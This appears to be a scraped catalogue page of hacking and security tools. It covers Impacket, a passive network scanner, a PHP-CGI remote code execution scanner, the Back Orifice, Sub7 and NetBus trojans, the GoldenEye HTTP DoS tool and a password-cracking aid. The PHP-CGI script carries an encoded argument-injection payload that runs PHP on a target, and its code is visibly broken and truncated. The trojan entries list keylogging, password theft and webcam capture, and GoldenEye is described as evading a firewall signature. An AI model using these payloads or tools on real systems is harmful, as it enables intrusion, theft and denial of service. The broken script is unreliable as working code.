Microsoft Windows


Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (for instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

Featured Protocols:
Ethernet, Linux "Cooked" capture.
IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)
NMB and SMB1/2/3 (high-level implementations).
DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP.
Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), EPM, SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC.

Extra Information:
The examples folders have many pre-built tools that can be used for various things such as pass the hash, dumping domain hashes, and golden ticket.


pyCryptocat - A Cryptocat standalone python client

Authors and contributors
Simone Margaritelli (evilsocket)
Raffaele Forte

Cryptocat is free software that aims to provide an open, accessible Instant Messaging environment that encrypts your conversations and works right in your browser.
pyCryptocat is a Cryptocat standalone chat client written in Python, using python-webkit package to serve Cryptocat JS and HTML files.
Cryptocat provides multi-user (and private) instant messaging inside chatrooms. It uses the OTR protocol for encrypted two-party chat and the (upcoming) mpOTR protocol for encrypted multi-party chat.
The goal is to provide the easiest, most accessible way to chat while maintaining your privacy online.


pMap is a tool for for passively discovering, scanning, and fingerprinting hosts on the local network. Included is a precompiled Windows binary.

Authored by Gregory Pickett | Site
Updated: Feb 4, 2014

Changes: Additional Multicast DNS and SSDP fingerprints. Excludes connected printers from fingerprinting process. Displays any available service configuration.

Reveals open TCP and UDP ports
Uses UDP, mDNS, and SSDP to identify PCs, NAS, Printers, Phones, Tablets, CCTV, DVR, and Others
Device Type, Make, and Model
Operating Systems and Version
Service Versions and Configuration
Stand-Alone (Nmap-like output) or Agent Mode (SYSLOG)
Metasploit Script Included

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.

Authored by infodox

# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print "[*] Testing Path: %s" %(path)
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
        haxor =, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"

def main(args):
    if len(sys.argv) !=2:


Simple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although may work on services.

Back Orifice (BO)

Back Orifice debuted at DEF CON 6 on August 1, 1998. It was the brainchild of Sir Dystic, a member of the U.S. hacker organization Cult of the Dead Cow. According to the group, its purpose was to demonstrate the lack of security in Microsoft's operating system Windows 98.

The last version was bo2k (back orifice 2k) which previously had the source code open & available for download. Currently we have been unable to locate a copy of that source.

The Back Orifice Server Contains the Following Functionality
System control
Create dialog boxes with the text of your choice. Log keystrokes. Lockup or reboot the machine.

Get detailed system information, including:
current user
cpu type
windows version
memory usage
mounted disks
(including hard drives, cdroms, removable drives and remote network drives) and information for those drives
screensaver password
passwords cached by the user
(including those for dialups, web and network access, and any other password cached by the operating system)

File system control
Copy, rename, delete, view, and search files and directories. File compression and decompression.
Process control
List, kill, and spawn processes.
Registry control
List, create, delete and set keys and values in the registry.
Network control
View all accessible network resources, all incoming and outgoing connections, list, create and delete network connections, list all exported resources and their passwords, create and delete exports.
Multimedia control
Play wav files, capture screen shots, and capture video or still frames from any video input device (like a Quickcam).
Packet redirection
Redirect any incoming TCP or UDP port to any other address & port.
Application redirection
Spawn most console applications (such as on any TCP port, allowing control of applications via a telnet session.
HTTP server Upload and download files on any port using a www client such as Netscape.

Sub7, Subseven

Sub7, or SubSeven or Sub7Server, is a remote administration tool/trojan program (RAT—where the "T" can have a dual meaning in this case).[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven".
Because its typical use is to allow undetected and unauthorized access, Sub7 is usually described as a trojan horse by security experts.
Sub7 worked on the Windows 9x and on the Windows NT family of operating systems, up to and including Windows XP

It was originally designed by someone with the handle 'mobman'. No development has occurred in several years until a new version scheduled for release on Feb. 28th, 2010. The Sub7 project was dormant for over 6 years until. In October 2009 mobman was alleged to have stated via IRC that due to working and going to college full-time that he will not be able to help with Sub7.

In 2006 a website ( / ( with hundreds of thousands of users kept the sub7 alive with clean downloads and support and new software. A new version was created by defcon but not released that only a hand full of people knew about and used well.

SubSeven 2.3, released on March 9, 2010, was revamped to work on all 32-bit and 64-bit versions of Windows and includes TCP Tunnel and Password Recovery for browsers, instant messengers and email clients.

Sub7 has more features than Netbus (webcam capture, multiple port redirect, user-friendly registry editor, chat and more), but it always tries to install itself into windows directory and it does not have activity logging.
According to a security analysis,[8] Sub7's server-side (target computer) features include:
sound files from a microphone attached to the machine
images from an attached video camera
screen shots of the computer
retrieving a listing of recorded and cached passwords


NetBus was written in Delphi by Carl-Fredrik Neikter, a Swedish programmer in March 1998. It was in wide circulation before Back Orifice was released, in August 1998. The author claimed that the program was meant to be used for pranks, not for illegally breaking into computer systems. Translated from Swedish, the name means "NetPrank".

When started for the first time, the server would install itself on the host computer, including modifying the Windows registry so that it starts automatically on each system startup. The server is a faceless process listening for connections on port 12345 (in some versions, the port number can be adjusted). Port 12346 is used for some tasks, as well as port 20034.

The client was a separate program presenting a graphical user interface that allowed the user to perform a number of activities on the remote computer. Examples of its capabilities:
Keystroke logging
Keystroke injection
Screen captures
Program launching
File browsing
Shutting down the system
Opening / closing CD-tray
Tunneling protocol (NetBus connections through a number of systems.)

The NetBus client was designed to support the following operating system versions:
Windows 95
Windows 98
Windows ME
Windows NT 4.0
Netbus client (v1.70) works fine in Windows 2000 and in Windows XP as well


GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is a HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye is an HTTP/S Layer 7 denial of service testing tool. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist socket connection busting through caching (when possible) until it consumes all available sockets on the HTTP/S server.

Changes: Referer strings from search engines now only domain part hardcoded. Referer generation function now generates even more random referers. Evades Juniper Netscreen signature. Various other updates and improvements.

Flag Description Default
-t, --threads Number of concurrent threads (default: 500)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help


Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

util/ - Fetchs user-agent lists from subpages (ex: ./ REQUIRES BEAUTIFULSOUP4

PACK - Password Analysis & Cracking Kit

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

The most basic analysis that you can perform is simply obtaining most common length, character-set and other characteristics of passwords in the provided list. In the example below, we will use 'rockyou.txt' containing approximately 14 million passwords. Launch with the following command line:
$ python rockyou.txt

Using filters
Let's see how RockYou users tend to select their passwords using the "stringdigit" simple mask (a string followed by numbers):
$ python ../PACK-0.0.3/archive/rockyou.txt --simplemask stringdigit -q --hiderare

Saving advanced masks
While the "Advanced Mask" section only displays patterns matching greater than 1% of all passwords, you can obtain and save a full list of password masks matching a given dictionary by using the following command:
$ python rockyou.txt -o rockyou.masks

MaskGen allows you to craft pattern-based mask attacks for input into Hashcat family of password crackers. The tool uses output produced by statsgen above with the '-o' flag in order to produce the most optimal mask attack sorted by mask complexity, mask occurrence or ratio of the two (optimal index).
Let's run MaskGen with only StatGen's output as an argument:
$ python rockyou.masks

Specifying target time

Syndicate content